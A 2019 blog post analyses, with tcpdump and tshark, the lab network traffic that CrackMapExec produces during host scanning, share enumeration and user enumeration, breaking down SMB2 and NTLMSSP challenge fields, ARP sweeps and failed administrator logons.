Thursday, May 2, 2019

Having Fun with CrackMapExec - Packet Analysis with tshark

Let's now take a look at the packets which are generated when crackmapexec is executed on our network

Here is the tcpdump filter which was configured to capture the traffic. The "-w" will change as I will have each crackmapexec command in its own pcap.

root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap

Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.

As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:

root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:1570 bytes:72502
  arp                                    frames:1521 bytes:64188
  ip                                     frames:49 bytes:8314
    tcp                                  frames:48 bytes:8244
      nbss                               frames:28 bytes:6940
        smb                              frames:3 bytes:381
        smb2                             frames:25 bytes:6559
    icmp                                 frames:1 bytes:70
===================================================================

Let's look into the TCP traffic by first looking at the conversations


root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:34564           <-> 10.0.0.105:445                   9      1598      10      1166      19      2764    10.223046000        10.5146
10.0.0.100:39670           <-> 10.0.0.3:445                     6      1669       8      1030      14      2699     7.135418000         0.0369
10.0.0.100:50874           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     7.174715000         0.0219
10.0.0.100:50838           <-> 10.0.0.2:445                     0         0       1        74       1        74     7.135206000         0.0000
================================================================================

Interestingly in the results returned from crackmapexec, there are 3 hosts in the results. However, above we see 4 conversations with port 445. Let's remove the bottom one as it returns a total of 74 bytes, while the top 3 has over 1000 bytes.

To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation with source port 34564 and destination port 445.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)"
  388  10.223046   10.0.0.100 → 10.0.0.105   TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128
  391  10.223405   10.0.0.105 → 10.0.0.100   TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  392  10.223423   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  395  10.224501   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
  399  10.225553   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  400  10.225566   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
  420  10.231080   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
  421  10.231694   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  444  10.238197   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  446  10.238929   10.0.0.105 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  447  10.243642   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
  448  10.244629   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  449  10.247201   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
  450  10.247610   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
  452  10.279539   10.0.0.105 → 10.0.0.100   TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
  453  10.279577   10.0.0.100 → 10.0.0.105   TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017
 1565  20.735709   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0
 1566  20.736058   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
 1567  20.737597   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0

Now that we have the above, we have an insight into what the communication looks like. We can see the TCP 3-way handshake has been completed and then we see the SMB session negotiated and processed, followed by the TCP connection being gracefully terminated.

Now if we were to look into the "Session Setup Response Message" for the NTLMSSP_NEGOTIATE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), as shown in record number 446, we should be able to gather information into how crackmapexec was able to determine the operating system, etc. Let's take a look at specific fields in the "Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE" packet to bring some clarity into this. Let's also adjust our tshark filter, to now only look at traffic coming back from the 3 devices found, while ignoring the ICMP frame. We will revisit the 1521 frames which show up in the protocol hierarchy shortly, but work with me for now.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)"
   11   7.135744     10.0.0.3 → 10.0.0.100   TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
   14   7.137411     10.0.0.3 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
   39   7.145265     10.0.0.3 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
   63   7.154134     10.0.0.3 → 10.0.0.100   SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   87   7.163947     10.0.0.3 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
  111   7.172290     10.0.0.3 → 10.0.0.100   TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0
  122   7.174930   10.0.0.103 → 10.0.0.100   TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  125   7.182170   10.0.0.103 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
  128   7.185537   10.0.0.103 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
  130   7.189042   10.0.0.103 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  132   7.194414   10.0.0.103 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
  134   7.196617   10.0.0.103 → 10.0.0.100   TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0
  391  10.223405   10.0.0.105 → 10.0.0.100   TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  399  10.225553   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  421  10.231694   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  446  10.238929   10.0.0.105 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  448  10.244629   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  450  10.247610   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
  452  10.279539   10.0.0.105 → 10.0.0.100   TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
 1566  20.736058   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
 1567  20.737597   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0

As we can see from above, we have a few response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. These matches with what crackmapexec found so far. let's now look into the specific fields to show how it learned the information it displayed. Before looking at the specific fields, let's take record number 446 and expand it to see some of the fields.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V
Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr  7, 2019 23:12:40.690090000 EDT
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1554693160.690090000 seconds
    [Time delta from previous captured frame: 0.000516000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 10.238929000 seconds]
    Frame Number: 446
    Frame Length: 409 bytes (3272 bits)
    Capture Length: 409 bytes (3272 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp]
Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c
    Destination: 08:00:27:ac:14:9c
        Address: 08:00:27:ac:14:9c
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 08:00:27:d1:1c:e7
        Address: 08:00:27:d1:1c:e7
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 395
    Identification: 0x515e (20830)
    Flags: 0x4000, Don't fragment
        0... .... .... .... = Reserved bit: Not set
        .1.. .... .... .... = Don't fragment: Set
        ..0. .... .... .... = More fragments: Not set
        ...0 0000 0000 0000 = Fragment offset: 0
    Time to live: 128
    Protocol: TCP (6)
    Header checksum: 0x9342 [validation disabled]
    [Header checksum status: Unverified]
    Source: 10.0.0.105
    Destination: 10.0.0.100
Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355
    Source Port: 445
    Destination Port: 34564
    [Stream index: 3]
    [TCP Segment Len: 355]
    Sequence number: 505    (relative sequence number)
    [Next sequence number: 860    (relative sequence number)]
    Acknowledgment number: 342    (relative ack number)
    0101 .... = Header Length: 20 bytes (5)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Nonce: Not set
        .... 0... .... = Congestion Window Reduced (CWR): Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window size value: 8211
    [Calculated window size: 2102016]
    [Window size scaling factor: 256]
    Checksum: 0x10ec [unverified]
    [Checksum Status: Unverified]
    Urgent pointer: 0
    [SEQ/ACK analysis]
        [This is an ACK to the segment in frame: 444]
        [The RTT to ACK the segment was: 0.000732000 seconds]
        [iRTT: 0.000377000 seconds]
        [Bytes in flight: 355]
        [Bytes sent since last PSH flag: 355]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.015883000 seconds]
        [Time since previous frame in this TCP stream: 0.000732000 seconds]
    TCP payload (355 bytes)
NetBIOS Session Service
    Message Type: Session message (0x00)
    Length: 351
SMB2 (Server Message Block Protocol version 2)
    SMB2 Header
        Server Component: SMB2
        Header Length: 64
        Credit Charge: 1
        NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)
        Command: Session Setup (1)
        Credits granted: 1
        Flags: 0x00000001, Response
            .... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE
            .... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command
            .... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command
            .... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed
            .... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1
            ...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation
            ..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation
        Chain Offset: 0x00000000
        Message ID: Unknown (2)
        Process Id: 0x00000000
        Tree Id: 0x00000000
        Session Id: 0x000048000000003d
        Signature: 00000000000000000000000000000000
        [Response to: 444]
        [Time from request: 0.000732000 seconds]
    Session Setup Response (0x01)
        StructureSize: 0x0009
            0000 0000 0000 100. = Fixed Part Length: 4
            .... .... .... ...1 = Dynamic Part: True
        Session Flags: 0x0000
            .... .... .... ...0 = Guest: False
            .... .... .... ..0. = Null: False
            .... .... .... .0.. = Encrypt: False
        Blob Offset: 0x00000048
        Blob Length: 279
        Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237...
            GSS-API Generic Security Service Application Program Interface
                Simple Protected Negotiation
                    negTokenTarg
                        negResult: accept-incomplete (1)
                        supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider)
                        responseToken: 4e544c4d53535000020000001600160038000000358289e2...
                        NTLM Secure Service Provider
                            NTLMSSP identifier: NTLMSSP
                            NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
                            Target Name: SECURITYNIK
                                Length: 22
                                Maxlen: 22
                                Offset: 56
                            Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia
                                1... .... .... .... .... .... .... .... = Negotiate 56: Set
                                .1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set
                                ..1. .... .... .... .... .... .... .... = Negotiate 128: Set
                                ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set
                                .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set
                                .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set
                                .... ..1. .... .... .... .... .... .... = Negotiate Version: Set
                                .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set
                                .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set
                                .... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set
                                .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set
                                .... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set
                                .... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set
                                .... .... .... .0.. .... .... .... .... = Target Type Share: Not set
                                .... .... .... ..0. .... .... .... .... = Target Type Server: Not set
                                .... .... .... ...1 .... .... .... .... = Target Type Domain: Set
                                .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set
                                .... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set
                                .... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set
                                .... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set
                                .... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set
                                .... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set
                                .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set
                                .... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set
                                .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set
                                .... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set
                                .... .... .... .... .... .... ..1. .... = Negotiate Seal: Set
                                .... .... .... .... .... .... ...1 .... = Negotiate Sign: Set
                                .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set
                                .... .... .... .... .... .... .... .1.. = Request Target: Set
                                .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set
                                .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set
                            NTLM Server Challenge: 67f26f829961c6cf
                            Reserved: 0000000000000000
                            Target Info
                                Length: 168
                                Maxlen: 168
                                Offset: 78
                                Attribute: NetBIOS domain name: SECURITYNIK
                                    Target Info Item Type: NetBIOS domain name (0x0002)
                                    Target Info Item Length: 22
                                    NetBIOS Domain Name: SECURITYNIK
                                Attribute: NetBIOS computer name: SECNIK-2K19
                                    Target Info Item Type: NetBIOS computer name (0x0001)
                                    Target Info Item Length: 22
                                    NetBIOS Computer Name: SECNIK-2K19
                                Attribute: DNS domain name: securitynik.local
                                    Target Info Item Type: DNS domain name (0x0004)
                                    Target Info Item Length: 34
                                    DNS Domain Name: securitynik.local
                                Attribute: DNS computer name: SECNIK-2K19.securitynik.local
                                    Target Info Item Type: DNS computer name (0x0003)
                                    Target Info Item Length: 58
                                    DNS Computer Name: SECNIK-2K19.securitynik.local
                                Attribute: Timestamp
                                    Target Info Item Type: Timestamp (0x0007)
                                    Target Info Item Length: 8
                                    Timestamp: Apr  7, 2019 23:12:40.658449900 EDT
                                Attribute: End of list
                                    Target Info Item Type: End of list (0x0000)
                                    Target Info Item Length: 0
                            Version 10.0 (Build 17763); NTLM Current Revision 15
                                Major Version: 10
                                Minor Version: 0
                                Build Number: 17763
                                NTLM Current Revision: 15

From above, we literally broke out all the fields for this packet. As you can see, a lot of this information which crackmapexec saw is already visible. Let's now prepare to wrap this part of it up by extracting those fields and presenting them in a more user-friendly manner.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y
ip.src tcp.srcport ip.dst tcp.dstport ntlmssp.identifier ntlmssp.challenge.target_name ntlmssp.challenge.target_info.nb_domain_name ntlmssp.version.major ntlmssp.version.build_number
10.0.0.3 445 10.0.0.100 39670 NTLMSSP SECURITYNIK-SYS SECURITYNIK-SYS 10 17763
10.0.0.103 445 10.0.0.100 50874 NTLMSSP SECURITYNIK-WIN SECURITYNIK-WIN 10 16299
10.0.0.105 445 10.0.0.100 34564 NTLMSSP SECURITYNIK SECURITYNIK 10 17763

Obviously, you should now try to extract some of the other fields that I did not include.

Before we go, if we remember when we looked at the protocol hierarchy, above there were ARP packets. Let's see what we can gather from these.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines
1521

From above, it looks like we have 1521 ICMP messages. Let's see what is really going on here. To help us understand what is going on, let's once again, look into the fields and parse the information of interest out.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac  -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more
arp.src.hw_mac  arp.src.proto_ipv4 arp.dst.proto_ipv4 arp.opcode
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.1 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.4 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.5 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.6 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.7 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.8 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.9 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.10 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.49 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.50 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.51 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.52 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.53 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.54 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.55 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.56 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.57 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.58 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.59 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.11 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.12 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.13 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.14 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.15 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.16 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.17 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.18 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.21 1

.... <truncated for brevity> ....

Let's now look at what the packets look like as CrackMapExec enumerates the shares

Let's once again start with looking at the protocol hierarchy

root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:487 bytes:131203
  arp                                    frames:5 bytes:300
  ip                                     frames:482 bytes:130903
    tcp                                  frames:482 bytes:130903
      nbss                               frames:394 bytes:115138
        smb                              frames:8 bytes:1016
        smb2                             frames:386 bytes:114122
          tcp.segments                   frames:2 bytes:2764
===================================================================

From above we see both SMB and SMB2 conversations. I take that to mean that the conversation probably started on SMB1 the negotiated to SMB2.

Let's look into the conversations.

root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:35710           <-> 10.0.0.105:445                  88     32754      95     19205     183     51959     4.701908000         1.3409
10.0.0.100:52026           <-> 10.0.0.103:445                  77     32785      88     19170     165     51955     4.702229000         1.3245
10.0.0.100:41024           <-> 10.0.0.3:445                    13      3322      17      3681      30      7003     4.778967000         1.2455
10.0.0.100:35716           <-> 10.0.0.105:445                  14      2952      15      2945      29      5897     4.797176000         1.2259
10.0.0.100:52032           <-> 10.0.0.103:445                  13      3074      15      2883      28      5957     5.162347000         0.8619
10.0.0.100:35708           <-> 10.0.0.105:445                   8      1512      10      1154      18      2666     4.658157000         1.3651
10.0.0.100:41016           <-> 10.0.0.3:445                     7      1729       8      1030      15      2759     4.657942000         0.1189
10.0.0.100:52018           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     4.657751000         0.0437
================================================================================

Let's do like the previous instance and look into one of the conversations. Let's take the first one with source port 35710.


root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more
35   4.701908   10.0.0.100 → 10.0.0.105   TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128
   37   4.702292   10.0.0.105 → 10.0.0.100   TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
   38   4.702307   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
   41   4.703211   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   44   4.706059   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45   4.706077   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
   48   4.709555   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   49   4.710187   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   52   4.719150   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   53   4.719743   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   56   4.728556   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   57   4.731502   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   59   4.734839   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   62   4.736363   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   63   4.753927   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   64   4.756372   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   68   4.760402   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   69   4.761060   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   72   4.772888   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   74   4.775421   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   76   4.778370   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   78   4.779050   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   81   4.786392   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   85   4.789841   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  103   4.829145   10.0.0.105 → 10.0.0.100   TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85
  104   4.829160   10.0.0.100 → 10.0.0.105   TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398
  118   4.870576   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  119   4.870976   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  120   4.870995   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0
...........
  463   5.966266   10.0.0.105 → 10.0.0.100   SMB2 182 Encrypted SMB3
  464   5.970495   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  465   5.970824   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
  468   6.013389   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0
  484   6.040763   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0
  485   6.041096   10.0.0.105 → 10.0.0.100   TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0
  486   6.042828   10.0.0.105 → 10.0.0.100   TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0

Uh oh!! Looks like this communication is encrypted with SMB3. However, if you pay close attention above, we see a number of "STATUS_LOGON_FAILURE" for "SECURITYNIK\Administrator". Let's leave this for now. Do note also most of the other conversations are much the same.

Let's now transition to the enumeration of the users and groups, to see what we can learn from the packets.

Looking at the traffic from the user enumeration, if we start with the conversations, we see 10 conversations being reported in the pcap file. if we look at the first one with port 36662, we see this ties back into our log analysis. Let's take a look at these packets to see what we can learn.


root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:36662           <-> 10.0.0.105:445                  81     20594      78     18654     159     39248     9.171767000         1.2807
10.0.0.100:52980           <-> 10.0.0.103:445                  58     15862      60     14173     118     30035     9.321117000         0.6187
10.0.0.100:36660           <-> 10.0.0.105:445                  13      2714      15      2933      28      5647     9.060796000         1.3251
10.0.0.100:52978           <-> 10.0.0.103:445                  13      3074      15      2887      28      5961     9.208452000         1.1786
10.0.0.100:36652           <-> 10.0.0.105:445                   9      1638      10      1166      19      2804     8.944584000         1.5418
10.0.0.100:41964           <-> 10.0.0.3:445                     7      1729      11      1451      18      3180     8.997733000         1.4911
10.0.0.100:52972           <-> 10.0.0.103:445                   7      1746      11      1459      18      3205     8.998512000         1.4915
10.0.0.100:36656           <-> 10.0.0.105:445                   8      1525       9      1409      17      2934     8.998254000         1.5223
10.0.0.100:52962           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     8.944150000         0.0536
10.0.0.100:41960           <-> 10.0.0.3:445                     6      1669       8      1030      14      2699     8.944373000         0.0425
================================================================================

Looking at the actual packets now


root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )"
